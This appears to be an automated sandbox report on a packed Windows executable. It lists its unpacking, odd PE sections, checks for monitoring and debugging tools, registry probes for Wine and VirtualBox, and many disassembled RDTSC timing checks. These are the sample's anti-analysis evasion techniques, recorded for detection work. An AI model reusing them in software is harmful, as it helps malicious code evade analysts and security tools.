Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: kernel.appcore.dllJump to behavior
Source: PqHnYMj5eF.exeStatic file information: File size 4495872 > 1048576
Source: PqHnYMj5eF.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: PqHnYMj5eF.exeStatic PE information: Raw size of qmfawksx is bigger than: 0x100000 < 0x1bd400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeUnpacked PE file: 0.2.PqHnYMj5eF.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qmfawksx:EW;zuykhosy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qmfawksx:EW;zuykhosy:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: PqHnYMj5eF.exeStatic PE information: real checksum: 0x456dfd should be: 0x44ee83
Source: PqHnYMj5eF.exeStatic PE information: section name:
Source: PqHnYMj5eF.exeStatic PE information: section name: .idata
Source: PqHnYMj5eF.exeStatic PE information: section name:
Source: PqHnYMj5eF.exeStatic PE information: section name: qmfawksx
Source: PqHnYMj5eF.exeStatic PE information: section name: zuykhosy
Source: PqHnYMj5eF.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_3_0183B160 push eax; ret 0_3_0183B169
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_3_018325E8 push eax; ret 0_3_018325E9
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_007441D0 push eax; mov dword ptr [esp], edx0_2_007441D5
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00442340 push eax; mov dword ptr [esp], 00000000h0_2_00442343
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0047C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0047C743
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00400AC0 push eax; mov dword ptr [esp], 00000000h0_2_00400AC4
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00421430 push eax; mov dword ptr [esp], 00000000h0_2_00421433
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_004439A0 push eax; mov dword ptr [esp], 00000000h0_2_004439A3
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0041DAD0 push eax; mov dword ptr [esp], edx0_2_0041DAD1
Source: PqHnYMj5eF.exeStatic PE information: section name: qmfawksx entropy: 7.956234866264717

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: AA2145 second address: AA214B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DBD4 second address: C1DBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DBDC second address: C1DBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DBE2 second address: C1DBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DBE7 second address: C1DBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED65FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DBF9 second address: C1DBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DBFD second address: C1DC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DC0A second address: C1DC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DC0E second address: C1DC14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DC14 second address: C1DC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBCB0E4CF6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DED4 second address: C1DEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1DEDB second address: C1DEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E050 second address: C1E066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED6602h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E066 second address: C1E074 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E1E9 second address: C1E1EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E36E second address: C1E372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C1E372 second address: C1E386 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBCB0ED65F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jnc 00007FBCB0ED65F6h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20C4B second address: C20C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a mov di, C353h 0x0000000e push F1783CEEh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20C63 second address: C20CDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBCB0ED65F8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f add dword ptr [esp], 0E87C392h 0x00000016 mov dword ptr [ebp+129C1BD2h], esi 0x0000001c push 00000003h 0x0000001e pushad 0x0000001f mov ecx, 200F3929h 0x00000024 mov eax, 1BAD6A22h 0x00000029 popad 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FBCB0ED65F8h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 jmp 00007FBCB0ED65FDh 0x0000004e call 00007FBCB0ED65F9h 0x00000053 jg 00007FBCB0ED65FEh 0x00000059 push eax 0x0000005a jbe 00007FBCB0ED6604h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20CDD second address: C20CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20CE1 second address: C20D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0ED6603h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D00 second address: C20D05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D05 second address: C20D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jg 00007FBCB0ED65F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D18 second address: C20D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FBCB0E4CF66h 0x0000000c jnp 00007FBCB0E4CF66h 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBCB0E4CF79h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20D4B second address: C20D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBCB0ED65F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E14 second address: C20E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 mov cx, 194Dh 0x0000000d call 00007FBCB0E4CF69h 0x00000012 jnc 00007FBCB0E4CF76h 0x00000018 push eax 0x00000019 push ecx 0x0000001a pushad 0x0000001b jp 00007FBCB0E4CF66h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 pop ecx 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jnp 00007FBCB0E4CF68h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E5B second address: C20E62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E62 second address: C20E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007FBCB0E4CF74h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007FBCB0E4CF66h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E8D second address: C20E93 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20E93 second address: C20F1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBCB0E4CF66h 0x00000009 jnl 00007FBCB0E4CF66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop eax 0x00000013 sub dword ptr [ebp+129C292Fh], ebx 0x00000019 push 00000003h 0x0000001b jmp 00007FBCB0E4CF74h 0x00000020 push 00000000h 0x00000022 sub esi, dword ptr [ebp+129C37C5h] 0x00000028 push 00000003h 0x0000002a jmp 00007FBCB0E4CF73h 0x0000002f push 4571B9BFh 0x00000034 jnp 00007FBCB0E4CF6Eh 0x0000003a jg 00007FBCB0E4CF68h 0x00000040 add dword ptr [esp], 7A8E4641h 0x00000047 movzx edi, si 0x0000004a lea ebx, dword ptr [ebp+12B42B18h] 0x00000050 add edx, dword ptr [ebp+129C38D1h] 0x00000056 xchg eax, ebx 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FBCB0E4CF6Fh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20F1B second address: C20F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20F79 second address: C20F8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20F8C second address: C20FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FBCB0ED6605h 0x00000013 jmp 00007FBCB0ED65FFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C20FAE second address: C21010 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCB0E4CF68h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push edx 0x0000000e mov di, bx 0x00000011 pop esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FBCB0E4CF68h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jp 00007FBCB0E4CF6Ch 0x00000034 mov esi, dword ptr [ebp+129C1BE7h] 0x0000003a movzx esi, si 0x0000003d call 00007FBCB0E4CF69h 0x00000042 jmp 00007FBCB0E4CF73h 0x00000047 push eax 0x00000048 pushad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C21010 second address: C21090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6607h 0x00000009 popad 0x0000000a jg 00007FBCB0ED660Eh 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FBCB0ED6609h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jc 00007FBCB0ED65FCh 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push edx 0x00000026 pop edx 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBCB0ED6604h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C3212F second address: C32149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF76h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4052C second address: C4054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6609h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4054E second address: C40554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40554 second address: C40560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBCB0ED65F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40711 second address: C40716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40716 second address: C4071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4071B second address: C4074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBCB0E4CF66h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FBCB0E4CF72h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FBCB0E4CF68h 0x0000001c pushad 0x0000001d popad 0x0000001e js 00007FBCB0E4CF68h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40898 second address: C4089E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4089E second address: C408A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C409E3 second address: C40A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6608h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E34 second address: C40E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007FBCB0E4CF68h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E41 second address: C40E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E47 second address: C40E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C40E4D second address: C40E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4110B second address: C4111E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBCB0E4CF6Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4111E second address: C41148 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCB0ED65FEh 0x00000008 jbe 00007FBCB0ED65F6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FBCB0ED65FFh 0x00000018 jbe 00007FBCB0ED6602h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41148 second address: C4114E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41266 second address: C41292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBCB0ED65FCh 0x0000000b push esi 0x0000000c jmp 00007FBCB0ED6607h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41292 second address: C4129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C413E2 second address: C413ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C413ED second address: C41435 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCB0E4CF75h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBCB0E4CF73h 0x00000010 pushad 0x00000011 jmp 00007FBCB0E4CF76h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41435 second address: C4144D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBCB0ED6600h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41DEE second address: C41DFA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCB0E4CF66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C41DFA second address: C41E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FCh 0x00000007 push ebx 0x00000008 jmp 00007FBCB0ED65FBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C42304 second address: C4230C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
